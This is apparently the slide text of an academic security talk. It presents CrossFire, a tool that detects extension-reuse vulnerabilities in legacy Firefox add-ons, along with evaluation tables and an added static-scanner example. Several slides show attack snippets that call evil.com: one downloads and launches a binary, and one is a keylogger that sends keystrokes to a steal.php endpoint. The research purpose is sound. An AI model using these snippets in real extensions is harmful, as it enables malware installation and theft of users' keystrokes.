Automated Detection of Firefox Extension-Reuse Vulnerabilities
Ahmet S. Buyukkayhan, William Robertson

Who are we?
• Assistant professor of computer science at Northeastern University in Boston, MA
• Co-directs the NEU Systems Security Lab with Engin Kirda
• Systems, network, and software security researcher
• Past winner of DEFCON CTF with Shellphish (a long, long time ago…)

Who are we?
• PhD candidate at Northeastern University
  – Authored peer-reviewed conference and journal papers in top-tier security venues
• Member of the NEU Systems Security Lab

(Slides: Singapore; Boston)

Agenda
• Background
• Extension-Reuse Attacks
• CrossFire & Demo
• Evaluation
• Conclusion

Background

Browser Extensions
• Add new capabilities, customization to browsers
• ~15K extensions in Mozilla Add-ons repository
• Popular ones have millions of users
• Mostly written in JavaScript

Legacy Firefox Extensions
• Shared JavaScript namespace
  – Extensions can read/write objects or variables of others
  – Can invoke functionality of others
• Shared window
  – Read/write GUI elements
  – Listen to all events
• No privilege separation
  – Full access to filesystem, network…
(Diagram: XUL, JavaScript, XPCOM, File System, Network)

Threat Model
• The browser is an attractive target
  – Extension authors are untrusted
• Vulnerable extensions can be exploited
  – "Benign-but-buggy" threat model
• Malicious extensions are a real threat
  – Trick users into installing malicious extensions
  – Powerful ("man-in-the-browser" attacks)
  – Easy to develop, difficult to detect
(161 malicious extensions are blocked by Mozilla: https://addons.mozilla.org/en-US/firefox/blocked/ – Feb 2016)

Existing Methods for Protection
• Enforcing browser marketplaces for extensions
  – Automated analysis
  – Human reviews
  – Extension signing
  – "Vetting"
• Extension isolation
  – Least privilege and policy-based enforcement

Add-on SDK (a.k.a., Jetpack)
• Introduced in 2009
• Isolates extensions from each other
• Separate content and core scripts
• Implements principle of least privilege
• But, adoption has been slow
  – October 2014: 12.0% of the top 2,000
  – March 2016: 22.9% of the top 2,000
• Superseded by WebExtensions (release date in Q3 2016)

Extension-Reuse Attacks

Attack Model
(Diagram: in the vetting sandbox, the evil extension makes no sensitive calls and shows no suspicious behavior; in the victim's browser, the evil extension calls into Extension X and Extension Y, which make the sensitive calls.)

Impact
• Lack of isolation leaves legacy extensions defenseless against capability leaks
• Attackers can stitch together exploits by abusing capabilities
• The more power vulnerable extensions have, the easier it is for an evil extension

Download & Execute Evil Binary

```javascript
const WebBrowserPersist = Components.Constructor(
  "@mozilla.org/embedding/browser/nsWebBrowserPersist;1",
  "nsIWebBrowserPersist");
var persist = WebBrowserPersist();
var targetFile = Components.classes["@mozilla.org/file/local;1"]
  .createInstance(Components.interfaces.nsILocalFile);
targetFile.initWithPath("evil.bin");
persist.saveURI("http://evil.com/evil.bin", null, null, null, "", targetFile, null);
targetFile.launch();
```

Extension-reuse Attack Example
(Diagram: Evil Extension → Extension X (Download, from the Internet to the File System) → Extension Y (Execute the Exe))

```javascript
var files = [{
  href: $url,
  description: "",
  fname: $path,
  noRedir: true
}];
gFlashGotService.download(files);

var gPrefMan = new GM_PrefManager();
gPrefMan.setValue("editor", $path);
GM_util.openInEditor();
```

To Reuse or Not To Reuse
Left: the direct version, with the attacker-chosen $url and $path.

```javascript
const WebBrowserPersist = Components.Constructor(
  "@mozilla.org/embedding/browser/nsWebBrowserPersist;1",
  "nsIWebBrowserPersist");
var persist = WebBrowserPersist();
var targetFile = Components.classes["@mozilla.org/file/local;1"]
  .createInstance(Components.interfaces.nsILocalFile);
targetFile.initWithPath($path);
persist.saveURI($url, null, null, null, "", targetFile, null);
targetFile.launch();
```

Right: the extension-reuse version from the previous slide (FlashGot download, then Greasemonkey openInEditor), which contains no sensitive calls of its own.

Another Example
• A key logger, which sends each key press to evil.com

```javascript
gd12.dicInline.urlWikPrefix = "http://evil.com/GD12_YOUR_LANG/steal.php?key=";
gd12.keydownHandler = function(e) {
  gd12.dicInline.lookupWikt(String.fromCharCode(e.which), false, false);
};
gd12.init();
```

(Diagram: key presses travel over the Internet to Evil.com)

CrossFire

CrossFire Overview
(Diagram)

DEMO

Evaluation

Method
• Top 10 most downloaded extensions
  – Manual analysis on all set
• Top 2000 most downloaded extensions
  – Manual analysis on random set of 323
• Case Study
  – Developed an extension with cross-extension function call
  – Applied to full review

Top 10 Firefox Extensions

| Extension Name | Automated Exploits | Manual Exploits | False Positives | # of Users |
|---|---|---|---|---|
| Adblock Plus | 0 | 0 | 4 | 22 M |
| Video DownloadHelper | 0 | 15 | 0 | 6.5 M |
| Firebug | 0 | 1 | 0 | 3 M |
| NoScript | 2 | 5 | 2 | 2.5 M |
| DownThemAll! | 0 | 5 | 0 | 1.5 M |
| Greasemonkey | 1 | 3 | 2 | 1.5 M |
| Web of Trust | 1 | 33 | 15 | 1.3 M |
| Flash Video Down. | 4 | 1 | 1 | 1.3 M |
| FlashGot Mass Down. | 3 | 5 | 9 | 1.3 M |
| Down. YouTube Videos | 0 | 2 | 1 | 1 M |

Summary of Results
Detected Vulnerabilities – Random Set

| | Manual | Automated |
|---|---|---|
| True Positives | 255 (73%) | 204 (80%) |
| False Positives | 96 (27%) | 51 (20%) |

(Chart: Positive Vulnerabilities by Attack Type)

Breakdown of Positive Vulnerabilities

| Category | Description |
|---|---|
| Code Execution | Execute binary or JS |
| File I/O | Read from/write to filesystem |
| Network Access | Open a URI or download a file |
| Preference Access | Read/write browser settings |
| Event Listener Reg. | Key logging events only |

Positive Vulnerabilities by Category: Network Access 66%, Code Execution 16%, File I/O 12%, Preference Access 3%, Event Listener Registration 3%

Performance
• Fast static analysis
  – ~1 sec average (per extension)

| Min | Q1 | Median | Mean | Q3 | Max |
|---|---|---|---|---|---|
| 0.05s | 0.18s | 0.28s | 1.06s | 0.51s | 763.91s |

• Fast exploit generation
  – ~380 secs (~6 mins) on average (per exploit)

| Min | Q1 | Median | Mean | Q3 | Max |
|---|---|---|---|---|---|
| 30s | 192s | 270s | 378.6s | 550.8s | 2160s |

Case Study
• ValidateThisWebSite
  – ~50 lines of code
  – No obfuscation or attempt to hide
  – Opens unnecessary harmless link

```javascript
// Attacker chooses $url
noscriptBM.placesUtils.__ns.__global__.ns.loadErrorPage(window[1], $url);
```

Limitations
• CrossFire is not a sound and precise analysis tool
• CrossFire does not handle
  – Inferring dynamic types
  – Prototype-based inheritance
  – String evaluation

Mitigation & Detection
• Isolation
• Least privilege
• Secure functionality and data sharing
• Check for extension-reuse vulnerabilities
• Mozilla security team is informed

Key Takeaways
• Lack of isolation allows stealthy attacks
• Attackers can easily automate
• More robust isolation, vetting, and analysis required

Thank You
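The "Check for extension-reuse vulnerabilities" point on the Mitigation & Detection slide can be illustrated with a small static check. The following is an added example, not CrossFire's code or any of the extensions' code: it scans legacy-extension JavaScript for the five sensitive-call categories the talk uses and reports which capability each line would leak if another extension reached it through the shared namespace. The pattern list and the sample source are assumptions constructed for this example.

```javascript
// Added example (not from the CrossFire slides): a minimal static check for the
// sensitive-call categories the talk uses. The API patterns below are an
// assumption chosen from the calls shown on the slides, not CrossFire's rule set.
const SENSITIVE_PATTERNS = [
  { category: "Code Execution", re: /\.launch\s*\(|\bopenInEditor\b|nsIProcess|\beval\s*\(/ },
  { category: "File I/O", re: /nsILocalFile|nsIFile\b|initWithPath|@mozilla\.org\/file\/local;1/ },
  { category: "Network Access", re: /saveURI\s*\(|nsIWebBrowserPersist|\.download\s*\(|loadURI\s*\(/ },
  { category: "Preference Access", re: /nsIPrefBranch|\.setValue\s*\(|\bsetCharPref\b|\bgetCharPref\b/ },
  { category: "Event Listener Registration", re: /addEventListener\s*\(\s*["']key(down|press|up)["']/ },
];

// Returns [{line, category, text}] for every source line that hits a pattern.
function scanExtensionSource(src) {
  const findings = [];
  src.split("\n").forEach((text, i) => {
    // Skip plain comment lines so commented-out code is not reported.
    if (/^\s*\/\//.test(text)) return;
    for (const { category, re } of SENSITIVE_PATTERNS) {
      if (re.test(text)) findings.push({ line: i + 1, category, text: text.trim() });
    }
  });
  return findings;
}

// Sorted, de-duplicated list of capability categories the file exposes.
function leakedCapabilities(src) {
  return [...new Set(scanExtensionSource(src).map(f => f.category))].sort();
}

// Constructed sample: the download & execute sequence from the talk, plus a
// keydown listener, as it might appear in a legacy extension's shared namespace.
const SAMPLE_SOURCE = `
const WebBrowserPersist = Components.Constructor(
  "@mozilla.org/embedding/browser/nsWebBrowserPersist;1", "nsIWebBrowserPersist");
var persist = WebBrowserPersist();
var targetFile = Components.classes["@mozilla.org/file/local;1"]
  .createInstance(Components.interfaces.nsILocalFile);
targetFile.initWithPath(path);
persist.saveURI(url, null, null, null, "", targetFile, null);
targetFile.launch();
window.addEventListener("keydown", function (e) { log(e.which); }, false);
`;

console.log("leaked capabilities:", leakedCapabilities(SAMPLE_SOURCE).join(", "));
for (const f of scanExtensionSource(SAMPLE_SOURCE)) console.log(`line ${f.line}: ${f.category}`);
```

A review pipeline would run this over every script an extension ships and treat any reported capability that is reachable from a global object as a candidate for manual review, which is the false-positive trade-off the evaluation slides quantify.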